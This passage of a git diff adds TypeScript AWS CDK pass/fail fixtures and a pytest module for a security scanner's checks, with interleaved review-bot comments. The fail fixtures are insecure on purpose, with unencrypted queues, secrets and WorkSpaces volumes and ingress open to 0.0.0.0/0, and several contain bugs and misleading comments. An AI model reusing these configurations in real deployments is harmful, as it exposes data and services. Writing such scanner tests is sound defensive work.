+const app = new App();
+new MyStack(app, 'MyStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts
new file mode 100644
index 00000000000..26cf0b84688
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts
@@ -0,0 +1,33 @@
+import { App, Stack } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as sqs from 'aws-cdk-lib/aws-sqs';
+
+class SqsQueueWithKmsKeyStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ new sqs.Queue(this, "MySqsQueue", {
+ encryption: sqs.QueueEncryption.KMS,
+ visibilityTimeout: cdk.Duration.seconds(300) // Other properties for the queue
+ });
+ }
+}
+
+const app = new App();
+new SqsQueueWithKmsKeyStack(app, "SqsQueueWithKmsKeyStack");
+app.synth();
+
+class SqsQueueWithKmsKeyIdStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ var mySqs = new sqs.CfnQueue(this, "MySqsQueue", {
+ visibilityTimeout: 300 // Other properties for the queue
+ // Specify the KMS key ID if needed here, e.g., kmsMasterKeyId: 'alias/aws/sqs'
+ });
+ }
+}
+
+const app2 = new App();
+new SqsQueueWithKmsKeyIdStack(app2, "SqsQueueWithKmsKeyIdStack");
+app2.synth();
diff --git a/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts b/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts
new file mode 100644
index 00000000000..2a2e7416744
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts
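Review bot: `cdk.Duration.seconds(300)` references a `cdk` namespace that SQSQueueEncryption/fail__2__.ts never imports (only `App`/`Stack`, `Construct` and `sqs` are), so the fixture is not a valid module on its own; either add `import * as cdk from 'aws-cdk-lib';` or import `Duration` next to `App, Stack` and write `Duration.seconds(300)`. SQSQueueEncryption/pass.ts has the same missing import. The first stack is counted as a failure even though it sets `encryption: sqs.QueueEncryption.KMS`, which on the L2 construct makes CDK provision a key when none is given — presumably the check requires an explicit `encryptionMasterKey` — so a comment on that construct stating that expectation would keep the fixture from looking like a false positive; `var mySqs` in the second stack is also never read and can be a bare `new sqs.CfnQueue(...)` like the first stack.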
@@ -0,0 +1,50 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sqs from 'aws-cdk-lib/aws-sqs';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as cfn from 'aws-cdk-lib/aws-cloudformation';
+import { Construct } from 'constructs';
+
+class SqsQueueWithKmsKeyStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Create a KMS key for encryption
+ const kmsKey = new kms.Key(this, 'MyKmsKey', {
+ enableKeyRotation: true,
+ });
+
+ // Create an SQS queue with KMS encryption
+ new sqs.Queue(this, 'MySqsQueue', {
+ encryption: sqs.QueueEncryption.KMS,
+ encryptionMasterKey: kmsKey,
+ visibilityTimeout: cdk.Duration.seconds(300), // Other properties for the queue
+ });
+ }
+}
+
+const app = new App();
+new SqsQueueWithKmsKeyStack(app, 'SqsQueueWithKmsKeyStack');
+app.synth();
+
+
+class SqsQueueWithKmsKeyIdStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define a custom KMS key
+ const kmsKey = new cfn.CfnCustomResource(this, 'MyKmsKeyResource', {
+ serviceToken: 'arn:aws:lambda:::function/',
+ // Add other properties as needed
+ });
+
+ // Define an SQS queue with a specific KmsMasterKeyId
+ new sqs.CfnQueue(this, 'MySqsQueue', {
+ kmsMasterKeyId: kmsKey.getAtt('KmsKeyId').toString(),
+ visibilityTimeout: 300, // Other properties for the queue
+ });
+ }
+}
+
+const app2 = new App();
+new SqsQueueWithKmsKeyIdStack(app2, 'SqsQueueWithKmsKeyIdStack');
+app2.synth();
diff --git a/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts
new file mode 100644
index 00000000000..3fb36259761
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts
@@ -0,0 +1,32 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as secretsmanager from 'aws-cdk-lib/aws-secretsmanager';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MySecretsStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define a SecretsManager secret with KMS key ID
+ const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+ secretName: 'MySecretName',
+ encryptionKey: kms.Key.fromKeyArn(this, 'MyKmsKey', 'arn:aws:kms:REGION:ACCOUNT_ID:key/aws/KMS_KEY_ID'),
+ });
+ }
+}
+
+class MySecretsStack2 extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define a SecretsManager secret without specifying KMS key ID
+ const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+ secretName: 'MySecretName',
+ });
+ }
+}
+
+const app = new App();
+new MySecretsStack(app, "MySecretsStack");
+new MySecretsStack2(app, "MySecretsStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts
new file mode 100644
index 00000000000..23a67584197
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts
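Review bot: The first stack in SecretManagerSecretEncrypted/fail__2__.ts is expected to fail even though it sets `encryptionKey`, and the only thing that distinguishes it from pass.ts is the `key/aws/` segment in the key ARN, yet its comment `// Define a SecretsManager secret with KMS key ID` is the same one the passing fixture uses. Presumably the check treats a key whose ARN contains `/aws/` as the AWS-managed default rather than a customer-managed key — confirm against the check's matching logic, since a real CMK ARN never contains that segment — and the comment should say so, e.g. `// Secret encrypted with the AWS-managed key (arn ... key/aws/...), which the check rejects`.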
@@ -0,0 +1,21 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as secretsmanager from 'aws-cdk-lib/aws-secretsmanager';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MySecretsStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define a SecretsManager secret with KMS key ID
+ const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+ secretName: 'MySecretName',
+ encryptionKey: kms.Key.fromKeyArn(this, 'MyKmsKey', 'arn:aws:kms:REGION:ACCOUNT_ID:key/KMS_KEY_ID'),
+ });
+ }
+}
+
+
+const app = new App();
+new MySecretsStack(app, "MySecretsStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts
new file mode 100644
index 00000000000..6380fdf361b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts
@@ -0,0 +1,83 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MySecurityGroupStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group with Ingress
+ const securityGroup = new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+ groupDescription: 'My security group',
+ securityGroupIngress: [
+ {
+ description: 'Allow HTTP inbound',
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ },
+ ],
+ // Other properties for your Security Group
+ });
+ }
+}
+
+class MySecurityGroupEgressStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group with Egress
+ const securityGroupEgress = new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+ groupDescription: 'My security group',
+ securityGroupEgress: [
+ {
+ description: 'Allow HTTP outbound',
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ },
+ ],
+ // Other properties for your Security Group
+ });
+ }
+}
+
+class MySecurityGroupIngressStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group Ingress
+ new ec2.CfnSecurityGroupIngress(this, 'MySecurityGroupIngress', {
+ groupId: 'your-security-group-id', // Replace with your Security Group ID
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ // Other properties for your Security Group Ingress
+ });
+ }
+}
+
+class MySecurityGroupEgressStack2 extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group Egress
+ new ec2.CfnSecurityGroupEgress(this, 'MySecurityGroupEgress', {
+ groupId: 'your-security-group-id', // Replace with your Security Group ID
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ // Other properties for your Security Group Egress
+ });
+ }
+}
+
+const app = new App();
+new MySecurityGroupStack(app, "MySecurityGroupStack");
+new MySecurityGroupIngressStack(app, "MySecurityGroupIngressStack");
+new MySecurityGroupEgressStack(app, "MySecurityGroupEgressStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts
new file mode 100644
index 00000000000..1262c9fdb11
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts
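Review bot: The file name promises four findings, yet the two `CfnSecurityGroup` rules in the first two stacks do carry a `description` ('Allow HTTP inbound' / 'Allow HTTP outbound'), and `MySecurityGroupEgressStack2` — the only Cfn egress rule without a description — is declared but never instantiated on `app`; if the check is purely attribute-based the count may still come out right because all four constructs are parsed, but as written the fixture does not say why the described rules are expected to fail. Add `new MySecurityGroupEgressStack2(app, "MySecurityGroupEgressStack2");` next to the other three so the file is self-consistent, and put a one-line comment on each stack stating the reason it is expected to fail so the expected count is reviewable. The `securityGroup` and `securityGroupEgress` consts are never read and can become bare `new ec2.CfnSecurityGroup(...)` statements as in pass.ts.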
@@ -0,0 +1,86 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MySecurityGroupStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group with Ingress Rules
+ new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+ groupDescription: 'My security group',
+ securityGroupIngress: [
+ {
+ description: 'True',
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ },
+ ],
+ // Other properties for your Security Group
+ });
+ }
+}
+
+class MySecurityGroupEgressStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group with Egress Rules
+ new ec2.CfnSecurityGroup(this, 'MySecurityGroupEgress', {
+ groupDescription: 'My security group',
+ securityGroupEgress: [
+ {
+ description: 'True',
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ },
+ ],
+ // Other properties for your Security Group
+ });
+ }
+}
+
+class MySecurityGroupIngressStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group Ingress
+ new ec2.CfnSecurityGroupIngress(this, 'MySecurityGroupIngress', {
+ groupId: 'your-security-group-id', // Replace with your Security Group ID
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ description: 'abc',
+ // Other properties for your Security Group Ingress
+ });
+ }
+}
+
+class MySecurityGroupEgressStack2 extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define EC2 Security Group Egress
+ new ec2.CfnSecurityGroupEgress(this, 'MySecurityGroupEgress', {
+ groupId: 'your-security-group-id', // Replace with your Security Group ID
+ ipProtocol: 'tcp',
+ fromPort: 80,
+ toPort: 80,
+ cidrIp: '0.0.0.0/0',
+ description: 'abc',
+ // Other properties for your Security Group Egress
+ });
+ }
+}
+
+const app = new App();
+new MySecurityGroupStack(app, "MySecurityGroupStack");
+new MySecurityGroupEgressStack(app, "MySecurityGroupEgressStack");
+new MySecurityGroupIngressStack(app, "MySecurityGroupIngressStack");
+new MySecurityGroupEgressStack2(app, "MySecurityGroupEgressStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts b/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts
new file mode 100644
index 00000000000..968a053b179
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts
@@ -0,0 +1,19 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as transfer from 'aws-cdk-lib/aws-transfer';
+import { Construct } from 'constructs';
+
+class MyTransferServerStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define Transfer Server with EndpointType set to a custom value
+ new transfer.CfnServer(this, 'MyTransferServer', {
+ endpointType: 'abc', // Replace 'abc' with your endpoint type
+ // Other properties as needed for your Transfer Server
+ });
+ }
+}
+
+const app = new App();
+new MyTransferServerStack(app, "MyTransferServerStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts b/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts
new file mode 100644
index 00000000000..0996be68464
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts
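Review bot: The negative fixture in TransferServerIsPublic/fail__1__.ts sets `endpointType: 'abc'`, which is not a value the service accepts, so the test passes only because the check rejects everything that is not VPC/VPC_ENDPOINT, not because it recognises a public endpoint. Use the real public value, `endpointType: 'PUBLIC',`, and consider a second stack that omits `endpointType` altogether, since a missing value presumably falls back to the public default and is the case most likely to appear in real code (worth confirming against the check implementation). The `// Replace 'abc' with your endpoint type` comment should go once the value is realistic.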
@@ -0,0 +1,32 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as transfer from 'aws-cdk-lib/aws-transfer';
+import { Construct } from 'constructs';
+
+class MyTransferServerStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define Transfer Server with EndpointType set to VPC
+ new transfer.CfnServer(this, 'MyTransferServer', {
+ endpointType: 'VPC',
+ // Other properties as needed for your Transfer Server
+ });
+ }
+}
+
+class MyTransferServerStack2 extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define Transfer Server with EndpointType set to VPC_ENDPOINT
+ new transfer.CfnServer(this, 'MyTransferServer2', {
+ endpointType: 'VPC_ENDPOINT',
+ // Other properties as needed for your Transfer Server
+ });
+ }
+}
+
+const app = new App();
+new MyTransferServerStack(app, "MyTransferServerStack");
+new MyTransferServerStack2(app, "MyTransferServerStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts
new file mode 100644
index 00000000000..2d99ed84e78
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts
@@ -0,0 +1,20 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MyVpcEndpointServiceStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define VPC Endpoint Service with acceptance not required
+ var x = new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService');
+
+ const y = new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService', {
+ acceptanceRequired: false,
+ });
+ }
+}
+
+const app = new App();
+new MyVpcEndpointServiceStack(app, "MyVpcEndpointServiceStack");
+app.synth();
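Review bot: Both `CfnVPCEndpointService` constructs in `MyVpcEndpointServiceStack` (VPCEndpointAcceptanceConfigured/fail__2__.ts) use the same construct id `'MyVPCEndpointService'`, which CDK rejects at synth time as a duplicate child, so this fixture cannot be synthesized if the scanner ever works from the template rather than the source. The first resource is also bound with `var x` and neither `x` nor `y` is read. Give the second resource its own id, `const y = new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService2', {`, and drop the unused bindings (`new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService');`); the `__2__` suffix suggests two expected findings, which both resources still yield after the rename.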
diff --git a/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts
new file mode 100644
index 00000000000..05c335bdfe0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts
@@ -0,0 +1,19 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MyVpcEndpointServiceStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Define VPC Endpoint Service with acceptance not required
+ new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService', {
+ acceptanceRequired: true,
+ // Other properties for your VPC Endpoint Service
+ });
+ }
+}
+
+const app = new App();
+new MyVpcEndpointServiceStack(app, "MyVpcEndpointServiceStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts b/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts
new file mode 100644
index 00000000000..c5355a72efb
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts
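Review bot: The comment `// Define VPC Endpoint Service with acceptance not required` in VPCEndpointAcceptanceConfigured/pass.ts contradicts the property directly below it, `acceptanceRequired: true`, which is the whole point of the positive fixture. Replace it with `// Define VPC Endpoint Service with acceptance required (expected to pass CKV_AWS_123)` so the fixture documents what it is testing.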
@@ -0,0 +1,30 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import { Construct } from 'constructs';
+
+class CloudFrontDistributionStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Create a CloudFront distribution
+ new cloudfront.CfnDistribution(this, 'MyCloudFrontDistribution', {
+ distributionConfig: {
+ defaultCacheBehavior: {
+ // Configure your cache behavior as needed
+ viewerProtocolPolicy: 'allow-all', // Example configuration
+ targetOriginId: 'myTargetOrigin', // Example configuration, needs to match an origin
+ forwardedValues: {
+ queryString: true,
+ cookies: { forward: 'none' },
+ },
+ },
+ enabled: true,
+ // Other distributionConfig properties as needed
+ },
+ });
+ }
+}
+
+const app = new App();
+new CloudFrontDistributionStack(app, "CloudFrontDistributionStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts b/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts
new file mode 100644
index 00000000000..39e0cfb29fd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts
@@ -0,0 +1,45 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as wafv2 from 'aws-cdk-lib/aws-wafv2';
+import { Construct } from 'constructs';
+
+class CloudFrontDistributionStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Create a WebACL
+ const webAcl = new wafv2.CfnWebACL(this, 'MyWebACL', {
+ defaultAction: { allow: {} },
+ scope: 'CLOUDFRONT',
+ visibilityConfig: {
+ cloudWatchMetricsEnabled: true,
+ metricName: 'webAclMetric',
+ sampledRequestsEnabled: true,
+ },
+ // Configure your WebACL as needed
+ rules: [],
+ });
+
+ // Create a CloudFront distribution
+ const distribution = new cloudfront.CfnDistribution(this, 'MyCloudFrontDistribution', {
+ distributionConfig: {
+ defaultCacheBehavior: {
+ // Configure your cache behavior as needed
+ viewerProtocolPolicy: 'allow-all', // Example configuration
+ targetOriginId: 'myTargetOrigin', // Example configuration, needs to match an origin
+ forwardedValues: {
+ queryString: false,
+ cookies: { forward: 'none' },
+ },
+ },
+ enabled: true,
+ webAclId: webAcl.attrArn, // Set the WebACL association
+ // Other distributionConfig properties as needed
+ },
+ });
+ }
+}
+
+const app = new App();
+new CloudFrontDistributionStack(app, 'CloudFrontDistributionStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts
new file mode 100644
index 00000000000..8a0c1239680
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts
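Review bot: The positive fixture in WAFEnabled/pass.ts keeps `viewerProtocolPolicy: 'allow-all'` and binds `const distribution` without ever reading it. A pass fixture should be clean apart from the property under test: `allow-all` is exactly what the CloudfrontDistributionEncryption check (CKV_AWS_34, wired up in test_checks_typescript.py in this same diff) flags, so unless the harness scopes findings by fixture directory this file contributes an unrelated failure. Use `viewerProtocolPolicy: 'redirect-to-https',` and `new cloudfront.CfnDistribution(this, 'MyCloudFrontDistribution', {` without the unused binding.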
@@ -0,0 +1,27 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Note: The creation of a WorkSpaces directory as depicted in the Python code isn't directly supported through AWS CDK as of my last update.
+ // Typically, you would use an existing directory (like an AD Connector or a Simple AD).
+ // However, let's assume we're associating the workspace with an existing directory for this example.
+
+ // Create a WorkSpaces workspace with root volume encryption enabled
+ new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+ directoryId: 'your-directory-id', // Replace with your actual directory ID
+ userName: 'my-user',
+ bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+ rootVolumeEncryptionEnabled: false,
+ userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+ // Workspace properties need to be defined here, if necessary.
+ });
+ }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts
new file mode 100644
index 00000000000..2b610ec03c2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/pass.ts
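Review bot: The three-line comment in WorkspaceRootVolumeEncrypted/fail__1__.ts beginning `// Note: The creation of a WorkSpaces directory as depicted in the Python code isn't directly supported through AWS CDK as of my last update.` is a leftover from a generated translation and refers to Python code that does not exist in this file, and the following `// Create a WorkSpaces workspace with root volume encryption enabled` states the opposite of what `rootVolumeEncryptionEnabled: false` does. Replace both with a single line such as `// Negative fixture: root and user volume encryption disabled (expected to fail CKV_AWS_156 / CKV_AWS_155)`. The byte-identical file added as WorkspaceUserVolumeEncrypted/fail__1__.ts (same blob id) carries the same comments and needs the same fix.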
@@ -0,0 +1,26 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Assuming the Directory ID is known and exists. Replace 'your-directory-id' with the actual Directory ID.
+ const directoryId = 'your-directory-id';
+
+ // Create a WorkSpaces workspace with root volume encryption enabled
+ new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+ directoryId: directoryId, // Use the known Directory ID
+ bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+ userName: 'my-user',
+ rootVolumeEncryptionEnabled: true,
+ userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+ // Other properties for your Workspace as needed
+ });
+ }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts
new file mode 100644
index 00000000000..8a0c1239680
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/fail__1__.ts
@@ -0,0 +1,27 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Note: The creation of a WorkSpaces directory as depicted in the Python code isn't directly supported through AWS CDK as of my last update.
+ // Typically, you would use an existing directory (like an AD Connector or a Simple AD).
+ // However, let's assume we're associating the workspace with an existing directory for this example.
+
+ // Create a WorkSpaces workspace with root volume encryption enabled
+ new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+ directoryId: 'your-directory-id', // Replace with your actual directory ID
+ userName: 'my-user',
+ bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+ rootVolumeEncryptionEnabled: false,
+ userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+ // Workspace properties need to be defined here, if necessary.
+ });
+ }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts
new file mode 100644
index 00000000000..aa0ee09f78f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceUserVolumeEncrypted/pass.ts
@@ -0,0 +1,26 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Assuming the Directory ID is known and exists. Replace 'your-directory-id' with the actual Directory ID.
+ const directoryId = 'your-directory-id';
+
+ // Create a WorkSpaces workspace with root volume encryption enabled
+ new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+ directoryId: directoryId, // Use the known Directory ID
+ bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+ userName: 'my-user',
+ rootVolumeEncryptionEnabled: true,
+ userVolumeEncryptionEnabled: true, // Set to true if you want user volume encryption
+ // Other properties for your Workspace as needed
+ });
+ }
+}
+
+const app = new App();
+new WorkSpacesStack(app, 'WorkSpacesStack');
+app.synth();
diff --git a/cdk_integration_tests/test_checks_typescript.py b/cdk_integration_tests/test_checks_typescript.py
index aa7e4cc6e34..31591d54f28 100644
--- a/cdk_integration_tests/test_checks_typescript.py
+++ b/cdk_integration_tests/test_checks_typescript.py
@@ -1,27 +1,425 @@
-from cdk_integration_tests.utils import run_check
+from typing import Dict, Any, List
+
 import pytest
+from cdk_integration_tests.utils import run_check, load_failed_checks_from_file
+
+LANGUAGE = 'typescript'
+
+
+@pytest.fixture(scope="session", autouse=True)
+def failed_checks() -> Dict[str, List[Dict[str, Any]]]:
+ report_failed_checks = load_failed_checks_from_file(LANGUAGE)
+ yield report_failed_checks
+
+
+def test_CKV_AWS_131_ALBDropHttpHeaders(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders",
+ language="typescript")
+
+
+def test_CKV_AWS_2_ALBListenerHTTPS(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_2", policy_name="ALBListenerHTTPS", language="typescript")
+
+
+def test_CKV_AWS_59_APIGatewayAuthorization(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization",
+ language="typescript")
+
+
+def test_CKV_AWS_76_APIGatewayAccessLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging",
+ language="typescript")
+
+
+def test_CKV_AWS_120_APIGatewayCacheEnable(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable",
+ language="typescript")
+
+
+def test_CKV_AWS_95_APIGatewayV2AccessLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging",
+ language="typescript")
+
+
+def test_CKV_AWS_73_APIGatewayXray(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_73", policy_name="APIGatewayXray", language="typescript")
+
+
+def test_CKV_AWS_194_AppSyncFieldLevelLogs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs",
+ language="typescript")
+
+
+def test_CKV_AWS_193_AppSyncLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_193", policy_name="AppSyncLogging", language="typescript")
+
+
+def test_CKV_AWS_82_AthenaWorkgroupConfiguration(failed_checks):
+ # need to wait for variable rendering in TS
